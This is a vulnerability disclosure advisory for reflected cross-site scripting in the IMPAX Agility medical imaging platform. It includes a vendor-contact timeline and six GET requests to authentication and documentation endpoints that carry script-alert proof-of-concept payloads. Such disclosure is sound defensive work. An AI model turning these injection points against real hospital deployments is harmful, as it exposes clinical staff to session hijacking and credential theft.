ImPAX Agility Multiple Cross Site Scripting Vulnerabilities

2016.04.14
Credit: vesp3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

ImPAX Agility Multiple Cross Site Scripting Vulnerabilities Tested versions: 1.1074.RC.b122.20150602 http://www.agfahealthcare.com/ Credits to: vesp3r / vesp3r7c3@gmail.com About the Product ------------------ IMPAX Agility is designed to achieve clinical productivity and improve affordability. It uses a single data model to provide a seamless system that offers relevant and varied clinical data in one, completely unified imaging management platform. IMPAX Agility’s sophisticated GUI provides users an uncluttered and intuitive user experience, as well the native diagnostic capabilities, streamlined navigation and workflow, improve clinical productivity. Its modern IT platform helps hospitals to maximize performance and control costs, by reducing overhead, upgrade time and IT infrastructure investments. Timeline contact --------------- 02/17 - initial contact 02/20 - Vendor asked for more information 03/30 - The vendor said the issue was solved 04/12 - Advisory published Reflected Cross-Site Scripting ----------------------------- 1) GET /authentication/j_security_check?ignore_expired=true&resource=%2fxero%2vtf8t3"><script>alert(1)<%2fscript>hcg7wy771pe&j_password=&j_username= HTTP/1.1 2) GET /authentication/j_security_check?vt123"><script>alert(1)<%2fscript>be4rz=1 HTTP/1.1 3) GET /docs/enterpriseviewer/knowledgebase/en/?awbkk"><script>alert(1)<%2fscript>q4kpp=1 HTTP/1.1 4) GET /docs/enterpriseviewer/knowledgebase/en/topics/8825.html?vtzi2"><script>alert(1)<%2fscript>a6wo4=1 HTTP/1.1 5) GET /authentication/token?resource=%2fdocs%2fenterpriseviewer%2fknowledgebase%2fen%2ftopics%2f124446.htmltestbug"><script>alert(1)<%2fscript>ahz3a HTTP/1.1 6) GET /authentication/token?khr8y"><script>alert(1)<%2fscript>tn1f0=1 HTTP/1.1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top